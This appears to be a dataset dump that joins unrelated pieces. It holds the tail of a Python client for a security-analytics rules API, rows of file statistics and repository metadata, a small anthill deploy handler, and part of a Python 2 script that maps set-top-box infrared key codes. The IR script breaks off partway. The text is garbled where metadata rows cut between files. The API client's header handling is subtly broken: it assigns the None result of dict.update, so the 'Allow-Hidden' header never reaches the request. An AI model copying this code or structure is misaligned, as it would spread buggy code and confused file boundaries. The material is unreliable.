Deletes a rule. To ensure safe deletion, a dependency check is carried out. This check might take some time. An asynchronous task to do is started for this check.
"""
function_endpoint = urljoin(self._baseurl, 'rule_groups/{group_id}'.format(group_id=group_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_rules(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/rules
Retrieves a list of rules.
"""
function_endpoint = urljoin(self._baseurl, 'rules')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_rules_rule_delete_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/rules/rule_delete_tasks/{task_id}
Retrieves the delete the rule task status.
"""
function_endpoint = urljoin(self._baseurl, 'rules/rule_delete_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_rules_rule_dependent_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/rules/rule_dependent_tasks/{task_id}
Retrieves the dependent rule task status.
"""
function_endpoint = urljoin(self._baseurl, 'rules/rule_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_rules_rule_dependent_tasks_by_task_id(self, task_id, *, task, fields=None, **kwargs):
"""
POST /analytics/rules/rule_dependent_tasks/{task_id}
Cancels the dependent the rule task.
"""
function_endpoint = urljoin(self._baseurl, 'rules/rule_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('POST', function_endpoint, json=task, **kwargs)
@request_vars('fields')
def get_rules_rule_dependent_tasks_results_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/rules/rule_dependent_tasks/{task_id}/results
Retrieves the rule dependent task results.
"""
function_endpoint = urljoin(self._baseurl,
'rules/rule_dependent_tasks/{task_id}/results'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def delete_rules_by_id(self, id, *, fields=None, **kwargs):
"""
DELETE /analytics/rules/{id}
Delete the rule. To ensure safe deletion, a dependency check is carried out. This check might take some time. An asynchronous task to do is started for this check.
"""
function_endpoint = urljoin(self._baseurl, 'rules/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, **kwargs)
@header_vars('fields')
def post_rules_by_id(self, id, *, rule, fields=None, **kwargs):
"""
POST /analytics/rules/{id}
Updates the rule owner or enabled/disabled only.
"""
function_endpoint = urljoin(self._baseurl, 'rules/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=rule, **kwargs)
@request_vars('fields')
def get_rules_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/rules/{id}
Retrieves a rule.
"""
function_endpoint = urljoin(self._baseurl, 'rules/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_rules_dependents_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/rules/{id}/dependents
Retrieves the objects that depend on the rule.
"""
function_endpoint = urljoin(self._baseurl, 'rules/{id}/dependents'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('sort', 'filter', 'fields')
def get_rules_with_data(self, *, sort=None, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/rules_with_data
Retrieves a list of rules.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'rules_with_data')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('fields')
def post_rules_with_data(self, *, rule, fields=None, **kwargs):
"""
POST /analytics/rules_with_data
Creates a CRE rule with supplied rule_data xml
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'rules_with_data')
return self._call('POST', function_endpoint, json=rule, headers=headers, **kwargs)
@header_vars('fields')
def post_rules_with_data_by_id(self, id, *, rule, fields=None, **kwargs):
"""
POST /analytics/rules_with_data/{id}
Updates a CRE rule with supplied rule_data xml
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'rules_with_data/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=rule, headers=headers, **kwargs)
@request_vars('fields')
def get_rules_with_data_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/rules_with_data/{id}
Retrieves a rule.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'rules_with_data/{id}'.format(id=id))
return self._call('GET', function_endpoint, headers=headers, **kwargs)
| 47.036398
| 195
| 0.664847
| 2,962
| 24,553
| 5.218771
| 0.05233
| 0.107647
| 0.077371
| 0.090827
| 0.925023
| 0.905809
| 0.866283
| 0.836978
| 0.780373
| 0.72422
| 0
| 0.000466
| 0.21362
| 24,553
| 521
| 196
| 47.126679
| 0.800135
| 0.229381
| 0
| 0.64898
| 0
| 0
| 0.133906
| 0.071018
| 0
| 0
| 0
| 0
| 0
| 1
| 0.216327
| false
| 0
| 0.016327
| 0
| 0.453061
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbdf34fdadfaa52a4cd800a4905f40b7b2ed9fe0
| 245
|
py
|
Python
|
handlers.py
|
anthill-gaming/game_controller
|
849ea700263d7724d7a66907e0961956940e6c64
|
[
"MIT"
] | null | null | null |
handlers.py
|
anthill-gaming/game_controller
|
849ea700263d7724d7a66907e0961956940e6c64
|
[
"MIT"
] | null | null | null |
handlers.py
|
anthill-gaming/game_controller
|
849ea700263d7724d7a66907e0961956940e6c64
|
[
"MIT"
] | null | null | null |
from anthill.framework.handlers.streaming.uploadfile import UploadFileStreamHandler
from anthill.platform.handlers import UserHandlerMixin
# noinspection PyAbstractClass
class DeployHandler(UploadFileStreamHandler, UserHandlerMixin):
pass
| 30.625
| 83
| 0.869388
| 21
| 245
| 10.142857
| 0.714286
| 0.103286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 245
| 7
| 84
| 35
| 0.950893
| 0.114286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
1db48c064187b04295c4a0423d1fc0c14549fe93
| 33,506
|
py
|
Python
|
IM_test/app_lib/parseIrkey.py
|
joakimzhang/qa_study
|
ff8930e674d45c49bea4e130d14d73d17b090e48
|
[
"Apache-2.0"
] | null | null | null |
IM_test/app_lib/parseIrkey.py
|
joakimzhang/qa_study
|
ff8930e674d45c49bea4e130d14d73d17b090e48
|
[
"Apache-2.0"
] | null | null | null |
IM_test/app_lib/parseIrkey.py
|
joakimzhang/qa_study
|
ff8930e674d45c49bea4e130d14d73d17b090e48
|
[
"Apache-2.0"
] | null | null | null |
r'''Parse configure file
This functions:
-- readConfigFile ()
'''
import ConfigParser
import os,sys
import globalVariable
class ParseIrkey(object):
def __init__(self):
self.irkey_file = 'irKey.cfg'
if globalVariable.serial_config['target_type'] == 'libra2':
self.section = 'Libra2'
elif globalVariable.serial_config['target_type'] == 'librasd':
self.section = 'Gospell'
elif globalVariable.serial_config['target_type'] == 'Sunplus':
self.section = 'Sunplus'
elif globalVariable.serial_config['target_type'] == 'SaiKeDa':
self.section = 'SaiKeDa'
self.irkey_abspath = os.path.join(os.getcwd(),
'caseInfo',
'irkey',
self.irkey_file)
self.config = ConfigParser.ConfigParser()
try:
self.cfg_fp = open(self.irkey_abspath,"r")
self.config.readfp(self.cfg_fp)
except Exception,e:
print e
sys.exit(-1)
self.insertIrk2Map(self.section)
def parseConfigItem(self, section, item, item_type='get'):
if self.config.has_section(section):
if self.config.has_option(section, item):
return getattr(self.config, item_type)(section, item)
else:
return False
else:
False
def insertIrk2Map(self, section):
if section=='Gospell':
sys_code = self.parseConfigItem(self.section,'System').split(':')[0]
power_code = self.parseConfigItem(self.section,'POWER').split(':')[0]
code_1 = self.parseConfigItem(self.section,'1').split(':')[0]
code_2 = self.parseConfigItem(self.section,'2').split(':')[0]
code_3 = self.parseConfigItem(self.section,'3').split(':')[0]
code_4 = self.parseConfigItem(self.section,'4').split(':')[0]
code_5 = self.parseConfigItem(self.section,'5').split(':')[0]
code_6 = self.parseConfigItem(self.section,'6').split(':')[0]
code_7 = self.parseConfigItem(self.section,'7').split(':')[0]
code_8 = self.parseConfigItem(self.section,'8').split(':')[0]
code_9 = self.parseConfigItem(self.section,'9').split(':')[0]
code_0 = self.parseConfigItem(self.section,'0').split(':')[0]
#pgup_code = self.parseConfigItem(self.section,'PgUp+').split(':')[0]
#pgdn_code = self.parseConfigItem(self.section,'PgDn-').split(':')[0]
pgup_code = self.parseConfigItem(self.section,'PG+').split(':')[0]
pgdn_code = self.parseConfigItem(self.section,'PG-').split(':')[0]
menu_code = self.parseConfigItem(self.section,'MENU').split(':')[0]
exit_code = self.parseConfigItem(self.section,'EXIT').split(':')[0]
up_code = self.parseConfigItem(self.section,'UP').split(':')[0]
dn_code = self.parseConfigItem(self.section,'DOWN').split(':')[0]
left_code = self.parseConfigItem(self.section,'LEFT').split(':')[0]
right_code = self.parseConfigItem(self.section,'RIGHT').split(':')[0]
ok_code = self.parseConfigItem(self.section,'OK').split(':')[0]
info_code = self.parseConfigItem(self.section,'Info').split(':')[0]
#dvr_code = self.parseConfigItem(self.section,'DVR').split(':')[0]
#vol_plus_code = self.parseConfigItem(self.section,'VOL+').split(':')[0]
#vol_minus_code = self.parseConfigItem(self.section,'VOL-').split(':')[0]
#list_code = self.parseConfigItem(self.section,'LIST').split(':')[0]
#back_code = self.parseConfigItem(self.section,'BACK').split(':')[0]
red_code = self.parseConfigItem(self.section,'RED').split(':')[0]
green_code = self.parseConfigItem(self.section,'GREEN').split(':')[0]
yellow_code = self.parseConfigItem(self.section,'YELLOW').split(':')[0]
blue_code = self.parseConfigItem(self.section,'BLUE').split(':')[0]
#ch_plus_code = self.parseConfigItem(self.section,'CH+').split(':')[0]
#ch_minus_code = self.parseConfigItem(self.section,'CH-').split(':')[0]
epg_code = self.parseConfigItem(self.section,'EPG').split(':')[0]
#time_code = self.parseConfigItem(self.section,'TIMER').split(':')[0]
#media_code = self.parseConfigItem(self.section,'MEDIA').split(':')[0]
#reclist_code = self.parseConfigItem(self.section,'RECLIST').split(':')[0]
audio_code = self.parseConfigItem(self.section,'AUDIO').split(':')[0]
tv_radio_code = self.parseConfigItem(self.section,'TV/R').split(':')[0]
mute_code = self.parseConfigItem(self.section,'MUTE').split(':')[0]
#subt_code = self.parseConfigItem(self.section,'SUBT').split(':')[0]
#vformat_code = self.parseConfigItem(self.section,'V.Format').split(':')[0]
zoom_code = self.parseConfigItem(self.section,'ZOOM').split(':')[0]
ttx_code = self.parseConfigItem(self.section,'TTX').split(':')[0]
pav_code = self.parseConfigItem(self.section,'FAV').split(':')[0]
find_code = self.parseConfigItem(self.section,'FIND').split(':')[0]
play_code = self.parseConfigItem(self.section,'REPLAY&START').split(':')[0]
pause_code = self.parseConfigItem(self.section,'PAUSE').split(':')[0]
stop_code = self.parseConfigItem(self.section,'STOP').split(':')[0]
sleep_code = self.parseConfigItem(self.section,'IGNORE').split(':')[0]
switch_code = self.parseConfigItem(self.section,'SWITCH').split(':')[0]
start_code = self.parseConfigItem(self.section,'START').split(':')[0]
single_code = self.parseConfigItem(self.section,'SINGLE').split(':')[0]
globalVariable.IRK_MAP['System'] = int(sys_code.strip(), 16)
globalVariable.IRK_MAP['POWER'] = int(power_code.strip(), 16)
globalVariable.IRK_MAP['1'] = int(code_1.strip(), 16)
globalVariable.IRK_MAP['2'] = int(code_2.strip(), 16)
globalVariable.IRK_MAP['3'] = int(code_3.strip(), 16)
globalVariable.IRK_MAP['4'] = int(code_4.strip(), 16)
globalVariable.IRK_MAP['5'] = int(code_5.strip(), 16)
globalVariable.IRK_MAP['6'] = int(code_6.strip(), 16)
globalVariable.IRK_MAP['7'] = int(code_7.strip(), 16)
globalVariable.IRK_MAP['8'] = int(code_8.strip(), 16)
globalVariable.IRK_MAP['9'] = int(code_9.strip(), 16)
globalVariable.IRK_MAP['0'] = int(code_0.strip(), 16)
globalVariable.IRK_MAP['PG+'] = int(pgup_code.strip(), 16)
globalVariable.IRK_MAP['PG-'] = int(pgdn_code.strip(), 16)
globalVariable.IRK_MAP['MENU'] = int(menu_code.strip(), 16)
globalVariable.IRK_MAP['EXIT'] = int(exit_code.strip(), 16)
globalVariable.IRK_MAP['UP'] = int(up_code.strip(), 16)
globalVariable.IRK_MAP['DOWN'] = int(dn_code.strip(), 16)
globalVariable.IRK_MAP['LEFT'] = int(left_code.strip(), 16)
globalVariable.IRK_MAP['RIGHT'] = int(right_code.strip(), 16)
globalVariable.IRK_MAP['OK'] = int(ok_code.strip(), 16)
globalVariable.IRK_MAP['INFO'] = int(info_code.strip(), 16)
#globalVariable.IRK_MAP['DVR'] = int(dvr_code.strip(), 16)
#globalVariable.IRK_MAP['VOL+'] = int(vol_plus_code.strip(), 16)
#globalVariable.IRK_MAP['VOL-'] = int(vol_minus_code.strip(), 16)
#globalVariable.IRK_MAP['LIST'] = int(list_code.strip(), 16)
#globalVariable.IRK_MAP['BACK'] = int(back_code.strip(), 16)
globalVariable.IRK_MAP['RED'] = int(red_code.strip(), 16)
globalVariable.IRK_MAP['GREEN'] = int(green_code.strip(), 16)
globalVariable.IRK_MAP['YELLOW'] = int(yellow_code.strip(), 16)
globalVariable.IRK_MAP['BLUE'] = int(blue_code.strip(), 16)
#globalVariable.IRK_MAP['CH+'] = int(ch_plus_code.strip(), 16)
#globalVariable.IRK_MAP['CH-'] = int(ch_minus_code.strip(), 16)
globalVariable.IRK_MAP['EPG'] = int(epg_code.strip(), 16)
#globalVariable.IRK_MAP['TIMER'] = int(time_code.strip(), 16)
#globalVariable.IRK_MAP['MEDIA'] = int(media_code.strip(), 16)
#globalVariable.IRK_MAP['RECLIST'] = int(reclist_code.strip(), 16)
globalVariable.IRK_MAP['AUDIO'] = int(audio_code.strip(), 16)
globalVariable.IRK_MAP['TV/R'] = int(tv_radio_code.strip(), 16)
globalVariable.IRK_MAP['MUTE'] = int(mute_code.strip(), 16)
#globalVariable.IRK_MAP['SUBT'] = int(subt_code.strip(), 16)
#globalVariable.IRK_MAP['V.Format'] = int(vformat_code.strip(), 16)
globalVariable.IRK_MAP['ZOOM'] = int(zoom_code.strip(), 16)
globalVariable.IRK_MAP['TTX'] = int(ttx_code.strip(), 16)
globalVariable.IRK_MAP['FAV'] = int(pav_code.strip(), 16)
globalVariable.IRK_MAP['FIND'] = int(find_code.strip(), 16)
globalVariable.IRK_MAP['REPLAY&START'] = int(play_code.strip(), 16)
globalVariable.IRK_MAP['PAUSE'] = int(pause_code.strip(), 16)
globalVariable.IRK_MAP['STOP'] = int(stop_code.strip(), 16)
globalVariable.IRK_MAP['IGNORE'] = int(sleep_code.strip(), 16)
globalVariable.IRK_MAP['SWITCH'] = int(switch_code.strip(), 16)
globalVariable.IRK_MAP['START'] = int(start_code.strip(), 16)
globalVariable.IRK_MAP['SINGLE'] = int(single_code.strip(), 16)
#print globalVariable.IRK_MAP['System']
elif section=='Libra2':
sys_code = self.parseConfigItem(self.section,'System').split(':')[0]
power_code = self.parseConfigItem(self.section,'POWER').split(':')[0]
code_1 = self.parseConfigItem(self.section,'1').split(':')[0]
code_2 = self.parseConfigItem(self.section,'2').split(':')[0]
code_3 = self.parseConfigItem(self.section,'3').split(':')[0]
code_4 = self.parseConfigItem(self.section,'4').split(':')[0]
code_5 = self.parseConfigItem(self.section,'5').split(':')[0]
code_6 = self.parseConfigItem(self.section,'6').split(':')[0]
code_7 = self.parseConfigItem(self.section,'7').split(':')[0]
code_8 = self.parseConfigItem(self.section,'8').split(':')[0]
code_9 = self.parseConfigItem(self.section,'9').split(':')[0]
code_0 = self.parseConfigItem(self.section,'0').split(':')[0]
pgup_code = self.parseConfigItem(self.section,'PgUp+').split(':')[0]
pgdn_code = self.parseConfigItem(self.section,'PgDn-').split(':')[0]
menu_code = self.parseConfigItem(self.section,'MENU').split(':')[0]
exit_code = self.parseConfigItem(self.section,'EXIT').split(':')[0]
up_code = self.parseConfigItem(self.section,'UP').split(':')[0]
dn_code = self.parseConfigItem(self.section,'DOWN').split(':')[0]
left_code = self.parseConfigItem(self.section,'LEFT').split(':')[0]
right_code = self.parseConfigItem(self.section,'RIGHT').split(':')[0]
ok_code = self.parseConfigItem(self.section,'OK').split(':')[0]
info_code = self.parseConfigItem(self.section,'Info').split(':')[0]
dvr_code = self.parseConfigItem(self.section,'DVR').split(':')[0]
vol_plus_code = self.parseConfigItem(self.section,'VOL+').split(':')[0]
vol_minus_code = self.parseConfigItem(self.section,'VOL-').split(':')[0]
list_code = self.parseConfigItem(self.section,'LIST').split(':')[0]
back_code = self.parseConfigItem(self.section,'BACK').split(':')[0]
red_code = self.parseConfigItem(self.section,'RED').split(':')[0]
green_code = self.parseConfigItem(self.section,'GREEN').split(':')[0]
yellow_code = self.parseConfigItem(self.section,'YELLOW').split(':')[0]
blue_code = self.parseConfigItem(self.section,'BLUE').split(':')[0]
ch_plus_code = self.parseConfigItem(self.section,'CH+').split(':')[0]
ch_minus_code = self.parseConfigItem(self.section,'CH-').split(':')[0]
epg_code = self.parseConfigItem(self.section,'EPG').split(':')[0]
time_code = self.parseConfigItem(self.section,'TIMER').split(':')[0]
media_code = self.parseConfigItem(self.section,'MEDIA').split(':')[0]
reclist_code = self.parseConfigItem(self.section,'RECLIST').split(':')[0]
audio_code = self.parseConfigItem(self.section,'AUDIO').split(':')[0]
tv_radio_code = self.parseConfigItem(self.section,'TV/RADIO').split(':')[0]
mute_code = self.parseConfigItem(self.section,'MUTE').split(':')[0]
subt_code = self.parseConfigItem(self.section,'SUBT').split(':')[0]
vformat_code = self.parseConfigItem(self.section,'V.Format').split(':')[0]
zoom_code = self.parseConfigItem(self.section,'ZOOM').split(':')[0]
ttx_code = self.parseConfigItem(self.section,'TTX').split(':')[0]
pav_code = self.parseConfigItem(self.section,'FAV').split(':')[0]
find_code = self.parseConfigItem(self.section,'FIND').split(':')[0]
play_code = self.parseConfigItem(self.section,'PLAY').split(':')[0]
pause_code = self.parseConfigItem(self.section,'PAUSE').split(':')[0]
stop_code = self.parseConfigItem(self.section,'STOP').split(':')[0]
qback_code = self.parseConfigItem(self.section,'QBACK').split(':')[0]
qplay_code = self.parseConfigItem(self.section,'QPLAY').split(':')[0]
rpoint_code = self.parseConfigItem(self.section,'RPoint').split(':')[0]
bstart_code = self.parseConfigItem(self.section,'BSTART').split(':')[0]
toend_code = self.parseConfigItem(self.section,'ToEND').split(':')[0]
opt_code = self.parseConfigItem(self.section,'OPT').split(':')[0]
sleep_code = self.parseConfigItem(self.section,'SLEEP').split(':')[0]
dely_code = self.parseConfigItem(self.section,'DELAY').split(':')[0]
globalVariable.IRK_MAP['System'] = int(sys_code.strip(), 16)
globalVariable.IRK_MAP['POWER'] = int(power_code.strip(), 16)
globalVariable.IRK_MAP['1'] = int(code_1.strip(), 16)
globalVariable.IRK_MAP['2'] = int(code_2.strip(), 16)
globalVariable.IRK_MAP['3'] = int(code_3.strip(), 16)
globalVariable.IRK_MAP['4'] = int(code_4.strip(), 16)
globalVariable.IRK_MAP['5'] = int(code_5.strip(), 16)
globalVariable.IRK_MAP['6'] = int(code_6.strip(), 16)
globalVariable.IRK_MAP['7'] = int(code_7.strip(), 16)
globalVariable.IRK_MAP['8'] = int(code_8.strip(), 16)
globalVariable.IRK_MAP['9'] = int(code_9.strip(), 16)
globalVariable.IRK_MAP['0'] = int(code_0.strip(), 16)
globalVariable.IRK_MAP['PgUp+'] = int(pgup_code.strip(), 16)
globalVariable.IRK_MAP['PgDn-'] = int(pgdn_code.strip(), 16)
globalVariable.IRK_MAP['MENU'] = int(menu_code.strip(), 16)
globalVariable.IRK_MAP['EXIT'] = int(exit_code.strip(), 16)
globalVariable.IRK_MAP['UP'] = int(up_code.strip(), 16)
globalVariable.IRK_MAP['DOWN'] = int(dn_code.strip(), 16)
globalVariable.IRK_MAP['LEFT'] = int(left_code.strip(), 16)
globalVariable.IRK_MAP['RIGHT'] = int(right_code.strip(), 16)
globalVariable.IRK_MAP['OK'] = int(ok_code.strip(), 16)
globalVariable.IRK_MAP['Info'] = int(info_code.strip(), 16)
globalVariable.IRK_MAP['DVR'] = int(dvr_code.strip(), 16)
globalVariable.IRK_MAP['VOL+'] = int(vol_plus_code.strip(), 16)
globalVariable.IRK_MAP['VOL-'] = int(vol_minus_code.strip(), 16)
globalVariable.IRK_MAP['LIST'] = int(list_code.strip(), 16)
globalVariable.IRK_MAP['BACK'] = int(back_code.strip(), 16)
globalVariable.IRK_MAP['RED'] = int(red_code.strip(), 16)
globalVariable.IRK_MAP['GREEN'] = int(green_code.strip(), 16)
globalVariable.IRK_MAP['YELLOW'] = int(yellow_code.strip(), 16)
globalVariable.IRK_MAP['BLUE'] = int(blue_code.strip(), 16)
globalVariable.IRK_MAP['CH+'] = int(ch_plus_code.strip(), 16)
globalVariable.IRK_MAP['CH-'] = int(ch_minus_code.strip(), 16)
globalVariable.IRK_MAP['EPG'] = int(epg_code.strip(), 16)
globalVariable.IRK_MAP['TIMER'] = int(time_code.strip(), 16)
globalVariable.IRK_MAP['MEDIA'] = int(media_code.strip(), 16)
globalVariable.IRK_MAP['RECLIST']= int(reclist_code.strip(), 16)
globalVariable.IRK_MAP['AUDIO'] = int(audio_code.strip(), 16)
globalVariable.IRK_MAP['TV/RADIO']= int(tv_radio_code.strip(), 16)
globalVariable.IRK_MAP['MUTE'] = int(mute_code.strip(), 16)
globalVariable.IRK_MAP['SUBT'] = int(subt_code.strip(), 16)
globalVariable.IRK_MAP['V.Format'] = int(vformat_code.strip(), 16)
globalVariable.IRK_MAP['ZOOM'] = int(zoom_code.strip(), 16)
globalVariable.IRK_MAP['TTX'] = int(ttx_code.strip(), 16)
globalVariable.IRK_MAP['FAV'] = int(pav_code.strip(), 16)
globalVariable.IRK_MAP['FIND'] = int(find_code.strip(), 16)
globalVariable.IRK_MAP['PLAY'] = int(play_code.strip(), 16)
globalVariable.IRK_MAP['PAUSE'] = int(pause_code.strip(), 16)
globalVariable.IRK_MAP['STOP'] = int(stop_code.strip(), 16)
globalVariable.IRK_MAP['QBACK'] = int(qback_code.strip(), 16)
globalVariable.IRK_MAP['QPLAY'] = int(qplay_code.strip(), 16)
globalVariable.IRK_MAP['RPoint'] = int(rpoint_code.strip(), 16)
globalVariable.IRK_MAP['BSTART'] = int(bstart_code.strip(), 16)
globalVariable.IRK_MAP['ToEND'] = int(toend_code.strip(), 16)
globalVariable.IRK_MAP['OPT'] = int(opt_code.strip(), 16)
globalVariable.IRK_MAP['SLEEP'] = int(sleep_code.strip(), 16)
globalVariable.IRK_MAP['DELAY'] = int(dely_code.strip(), 16)
#print globalVariable.IRK_MAP['System']
elif section=='Sunplus':
sys_code = self.parseConfigItem(self.section,'System').split(':')[0]
power_code = self.parseConfigItem(self.section,'POWER').split(':')[0]
code_1 = self.parseConfigItem(self.section,'1').split(':')[0]
code_2 = self.parseConfigItem(self.section,'2').split(':')[0]
code_3 = self.parseConfigItem(self.section,'3').split(':')[0]
code_4 = self.parseConfigItem(self.section,'4').split(':')[0]
code_5 = self.parseConfigItem(self.section,'5').split(':')[0]
code_6 = self.parseConfigItem(self.section,'6').split(':')[0]
code_7 = self.parseConfigItem(self.section,'7').split(':')[0]
code_8 = self.parseConfigItem(self.section,'8').split(':')[0]
code_9 = self.parseConfigItem(self.section,'9').split(':')[0]
code_0 = self.parseConfigItem(self.section,'0').split(':')[0]
pgup_code = self.parseConfigItem(self.section,'>>|').split(':')[0]
pgdn_code = self.parseConfigItem(self.section,'|<<').split(':')[0]
menu_code = self.parseConfigItem(self.section,'MENU').split(':')[0]
exit_code = self.parseConfigItem(self.section,'EXIT').split(':')[0]
up_code = self.parseConfigItem(self.section,'UP').split(':')[0]
dn_code = self.parseConfigItem(self.section,'DOWN').split(':')[0]
left_code = self.parseConfigItem(self.section,'LEFT').split(':')[0]
right_code = self.parseConfigItem(self.section,'RIGHT').split(':')[0]
ok_code = self.parseConfigItem(self.section,'OK').split(':')[0]
info_code = self.parseConfigItem(self.section,'INFO').split(':')[0]
dvr_code = self.parseConfigItem(self.section,'SAT').split(':')[0]
#vol_plus_code = self.parseConfigItem(self.section,'VOL+').split(':')[0]
#vol_minus_code = self.parseConfigItem(self.section,'VOL-').split(':')[0]
#list_code = self.parseConfigItem(self.section,'LIST').split(':')[0]
back_code = self.parseConfigItem(self.section,'RECALL').split(':')[0]
red_code = self.parseConfigItem(self.section,'RED').split(':')[0]
green_code = self.parseConfigItem(self.section,'GREEN').split(':')[0]
yellow_code = self.parseConfigItem(self.section,'YELLOW').split(':')[0]
blue_code = self.parseConfigItem(self.section,'BLUE').split(':')[0]
#ch_plus_code = self.parseConfigItem(self.section,'CH+').split(':')[0]
#ch_minus_code = self.parseConfigItem(self.section,'CH-').split(':')[0]
epg_code = self.parseConfigItem(self.section,'EPG').split(':')[0]
time_code = self.parseConfigItem(self.section,'TIMER').split(':')[0]
media_code = self.parseConfigItem(self.section,'SOURCE').split(':')[0]
reclist_code = self.parseConfigItem(self.section,'FILELIST').split(':')[0]
audio_code = self.parseConfigItem(self.section,'AUDIO').split(':')[0]
tv_radio_code = self.parseConfigItem(self.section,'TV/R').split(':')[0]
mute_code = self.parseConfigItem(self.section,'MUTE').split(':')[0]
subt_code = self.parseConfigItem(self.section,'SUB').split(':')[0]
#vformat_code = self.parseConfigItem(self.section,'V.Format').split(':')[0]
zoom_code = self.parseConfigItem(self.section,'ZOOM').split(':')[0]
ttx_code = self.parseConfigItem(self.section,'TTX/CC').split(':')[0]
pav_code = self.parseConfigItem(self.section,'FAV').split(':')[0]
#find_code = self.parseConfigItem(self.section,'FIND').split(':')[0]
play_code = self.parseConfigItem(self.section,'Play').split(':')[0]
pause_code = self.parseConfigItem(self.section,'Pause').split(':')[0]
stop_code = self.parseConfigItem(self.section,'Stop').split(':')[0]
qback_code = self.parseConfigItem(self.section,'<<').split(':')[0]
qplay_code = self.parseConfigItem(self.section,'>>').split(':')[0]
rpoint_code = self.parseConfigItem(self.section,'Rec').split(':')[0]
#bstart_code = self.parseConfigItem(self.section,'BSTART').split(':')[0]
globalVariable.IRK_MAP['System'] = int(sys_code.strip(), 16)
globalVariable.IRK_MAP['POWER'] = int(power_code.strip(), 16)
globalVariable.IRK_MAP['1'] = int(code_1.strip(), 16)
globalVariable.IRK_MAP['2'] = int(code_2.strip(), 16)
globalVariable.IRK_MAP['3'] = int(code_3.strip(), 16)
globalVariable.IRK_MAP['4'] = int(code_4.strip(), 16)
globalVariable.IRK_MAP['5'] = int(code_5.strip(), 16)
globalVariable.IRK_MAP['6'] = int(code_6.strip(), 16)
globalVariable.IRK_MAP['7'] = int(code_7.strip(), 16)
globalVariable.IRK_MAP['8'] = int(code_8.strip(), 16)
globalVariable.IRK_MAP['9'] = int(code_9.strip(), 16)
globalVariable.IRK_MAP['0'] = int(code_0.strip(), 16)
globalVariable.IRK_MAP['>>|'] = int(pgup_code.strip(), 16)
globalVariable.IRK_MAP['|<<'] = int(pgdn_code.strip(), 16)
globalVariable.IRK_MAP['MENU'] = int(menu_code.strip(), 16)
globalVariable.IRK_MAP['EXIT'] = int(exit_code.strip(), 16)
globalVariable.IRK_MAP['UP'] = int(up_code.strip(), 16)
globalVariable.IRK_MAP['DOWN'] = int(dn_code.strip(), 16)
globalVariable.IRK_MAP['LEFT'] = int(left_code.strip(), 16)
globalVariable.IRK_MAP['RIGHT'] = int(right_code.strip(), 16)
globalVariable.IRK_MAP['OK'] = int(ok_code.strip(), 16)
globalVariable.IRK_MAP['INFO'] = int(info_code.strip(), 16)
globalVariable.IRK_MAP['SAT'] = int(dvr_code.strip(), 16)
#globalVariable.IRK_MAP['VOL+'] = int(vol_plus_code.strip(), 16)
#globalVariable.IRK_MAP['VOL-'] = int(vol_minus_code.strip(), 16)
#globalVariable.IRK_MAP['LIST'] = int(list_code.strip(), 16)
globalVariable.IRK_MAP['RECALL'] = int(back_code.strip(), 16)
globalVariable.IRK_MAP['RED'] = int(red_code.strip(), 16)
globalVariable.IRK_MAP['GREEN'] = int(green_code.strip(), 16)
globalVariable.IRK_MAP['YELLOW'] = int(yellow_code.strip(), 16)
globalVariable.IRK_MAP['BLUE'] = int(blue_code.strip(), 16)
#globalVariable.IRK_MAP['CH+'] = int(ch_plus_code.strip(), 16)
#globalVariable.IRK_MAP['CH-'] = int(ch_minus_code.strip(), 16)
globalVariable.IRK_MAP['EPG'] = int(epg_code.strip(), 16)
globalVariable.IRK_MAP['TIMER'] = int(time_code.strip(), 16)
globalVariable.IRK_MAP['SOURCE'] = int(media_code.strip(), 16)
globalVariable.IRK_MAP['FILELIST']= int(reclist_code.strip(), 16)
globalVariable.IRK_MAP['AUDIO'] = int(audio_code.strip(), 16)
globalVariable.IRK_MAP['TV/R']= int(tv_radio_code.strip(), 16)
